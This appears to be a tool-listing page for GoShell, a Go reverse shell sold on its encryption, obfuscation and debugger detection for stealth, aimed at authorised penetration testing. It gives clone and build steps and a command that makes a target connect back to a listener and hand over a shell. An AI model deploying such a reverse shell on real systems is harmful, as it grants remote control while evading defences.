GoShell is a cross-platform Go-based reverse shell featuring AES encryption, string obfuscation, and debugger detection for secure and stealthy penetration testing.
A Go reverse shell with AES encryption, string obfuscation, debugger detection, and cross-platform compatibility, designed for educational purposes and authorized penetration testing.
This tool is primarily used by penetration testers and red teamers to establish encrypted and obfuscated reverse shell connections on target systems, enhancing stealth and security during engagements. It is designed for educational purposes and authorized security assessments to demonstrate secure reverse shell techniques.
Use this tool only in authorized environments to avoid legal issues. The AES encryption and obfuscation improve stealth but do not guarantee evasion against advanced detection systems. Ensure Go environment is properly set up before building.
Ensure Go is installed on your system
Clone the repository: git clone https://github.com/0xrootmeow/GoShell.git
Navigate to the project directory: cd GoShell
Build the binary using Go: go build
Run the compiled executable on the target or listener as needed
./GoShell -l <local_ip>:<port>
Start the listener on the specified IP and port to await reverse shell connections
./GoShell -c <listener_ip>:<port>
Connect back to the listener at the specified IP and port, initiating the reverse shell